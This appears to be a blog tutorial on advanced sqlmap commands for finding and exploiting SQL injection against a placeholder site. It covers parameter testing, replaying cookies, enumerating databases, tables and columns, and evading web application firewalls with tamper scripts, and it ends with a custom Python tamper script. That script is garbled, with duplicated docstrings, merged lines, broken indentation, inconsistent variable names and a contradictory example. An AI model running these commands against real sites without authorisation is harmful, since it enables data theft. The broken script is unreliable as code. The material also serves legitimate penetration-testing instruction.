Advance Sqlmap Commands

Advance Sqlmap tutorial

1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case. The syntax for the GET request is as follow ./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy" The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.

2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" sqlmap will try to check if parameter "id" is injectable or not.

3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,a) Login into your application.b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5.... To get the tables of dummydb database , the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"

6.... To get the columns of admin table, the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"

7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.

9.... Writing your own Tamper script.There are certain cases when application has very weak detection signature but none of the tamper script can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to injectthat target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.So let us create our own tamper script. The format of any tamper script will be as follow


# Needed imports
from lib.core.enums import PRIORITY

#Define which is the order of application of tamper scripts against the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

''' Description of your tamper script

''' Description of your tamper script ''' Description of your tamper script '''

retVal = payload

# your code to tamper the original payload # return the tampered payload 

return retVal

Based on the above tamper script format, our script will be

#!/usr/bin/env python 
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
""" 
from lib.core.enums import PRIORITY __priority____priority__ = PRIORITY.NORMAL
def tamper(payload): 
""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """ 
INPUT    : UNION ALL SELECT 
OUTPUT : UNION ALL SELECT
TESTED AGAINST: mysql 5.x.x 
""" 
if payload: 
   retVal="" i=0 for i in xrange(len(payload)): 
if payload[i:i+10] == "ALL SELECT": 
  retVal +="ALL SELEcT" + payload[i+10:] 
break 
else: retval += payload[i] 
return retVal